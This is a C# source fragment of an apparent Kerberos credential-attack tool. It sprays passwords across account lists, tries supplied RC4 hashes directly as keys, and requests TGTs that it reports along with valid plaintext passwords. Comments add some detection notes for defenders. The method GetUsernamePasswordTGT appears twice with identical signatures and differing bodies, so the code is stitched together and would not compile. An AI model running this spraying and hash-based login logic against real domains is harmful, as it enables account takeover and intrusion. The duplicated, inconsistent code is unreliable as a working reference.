/// <summary>
/// Tests every password against every username, then every supplied hash against
/// every username, always with the rc4_hmac encryption type.
/// </summary>
/// <param name="usernames">Account names to test; a trailing '$' selects the computer-account salt.</param>
/// <param name="passwords">Plaintext candidates; each is hashed once per username before it is tested.</param>
/// <param name="hashes">Key material handed to TestUsernamePassword unchanged, paired with an empty password string.</param>
/// <returns>true if TestUsernamePassword returned true for at least one pair; otherwise false.</returns>
public bool Attack(string[] usernames, string[] passwords, string[] hashes)
{
    bool anyValid = false;

    // Passwords are the outer loop, so each account gets one attempt per password pass.
    // Detection note: failures are spread across accounts rather than concentrated on one,
    // so counting failed pre-authentications per source is more telling than per account.
    foreach (string candidate in passwords)
    {
        foreach (string account in usernames)
        {
            // User salt is REALM + name; computer accounts (trailing '$') use
            // REALM + "host" + lower-cased name without '$' + "." + lower-cased realm.
            // NOTE(review): RC4-HMAC keys are unsalted (RFC 4757), so the salt is presumably
            // ignored by KerberosPasswordHash for this etype; confirm against that helper.
            string salt = account.EndsWith("$")
                ? domain.ToUpper() + "host" + account.TrimEnd('$').ToLower() + "." + domain.ToLower()
                : domain.ToUpper() + account;

            // best result with rc4
            // Detection note: rc4_hmac is etype 23; in a domain that normally negotiates AES,
            // RC4 pre-authentication is a useful signal in KDC audit logs. This assumes
            // TestUsernamePassword sends a Kerberos request, which is not visible here.
            string key = Crypto.KerberosPasswordHash(Interop.KERB_ETYPE.rc4_hmac, candidate, salt);

            // |= does not short-circuit: the test runs for every pair even after a hit.
            anyValid |= this.TestUsernamePassword(account, key, candidate, Interop.KERB_ETYPE.rc4_hmac);
        }
    }

    // Second pass: caller-supplied hashes are used directly as the key, with no password to report.
    foreach (string suppliedHash in hashes)
    {
        foreach (string account in usernames)
        {
            anyValid |= this.TestUsernamePassword(account, suppliedHash, "", Interop.KERB_ETYPE.rc4_hmac);
        }
    }

    return anyValid;
}
/// <summary>
/// Derives an aes256_cts_hmac_sha1 key from the password, requests a TGT with it through
/// Ask.InnerTGT, and passes the result to ReportValidPassword.
/// </summary>
/// <param name="username">Account name; lower-cased when building the salt.</param>
/// <param name="password">Plaintext password the key is derived from; also forwarded to ReportValidPassword.</param>
private void GetUsernamePasswordTGT(string username, string password)
{
    // Salt is the upper-cased realm followed by the lower-cased account name.
    // This version applies that user-principal salt to every name, including names ending in '$'.
    string salt = domain.ToUpper() + username.ToLower();

    string aesKey = Crypto.KerberosPasswordHash(Interop.KERB_ETYPE.aes256_cts_hmac_sha1, password, salt);

    // The trailing 'false' is passed through as-is; its meaning is defined by Ask.InnerTGT (not visible here).
    byte[] ticket = Ask.InnerTGT(username, domain, aesKey, Interop.KERB_ETYPE.aes256_cts_hmac_sha1, false, this.dc);

    // Hands the plaintext password and the returned bytes to the reporting routine.
    this.ReportValidPassword(username, password, ticket);
}
/// <summary>
/// Derives an aes256_cts_hmac_sha1 key from the password, builds an AS-REQ with it,
/// requests a TGT through Ask.InnerTGT, and passes the result to ReportValidPassword.
/// </summary>
/// <param name="username">Account name; a trailing '$' selects the computer-account salt.</param>
/// <param name="password">Plaintext password the key is derived from; also forwarded to ReportValidPassword.</param>
private void GetUsernamePasswordTGT(string username, string password)
{
    // special case for computer account salts:
    // REALM + "host" + lower-cased name without '$' + "." + lower-cased realm.
    // Every other account uses REALM + lower-cased name.
    string salt = username.EndsWith("$")
        ? domain.ToUpper() + "host" + username.TrimEnd('$').ToLower() + "." + domain.ToLower()
        : domain.ToUpper() + username.ToLower();

    string aesKey = Crypto.KerberosPasswordHash(Interop.KERB_ETYPE.aes256_cts_hmac_sha1, password, salt);

    AS_REQ request = AS_REQ.NewASReq(username, domain, aesKey, Interop.KERB_ETYPE.aes256_cts_hmac_sha1);

    // 'null' and 'false' are passed through as-is; their meaning is defined by Ask.InnerTGT (not visible here).
    byte[] ticket = Ask.InnerTGT(request, Interop.KERB_ETYPE.aes256_cts_hmac_sha1, null, false, this.dc);

    // Hands the plaintext password and the returned bytes to the reporting routine.
    this.ReportValidPassword(username, password, ticket);
}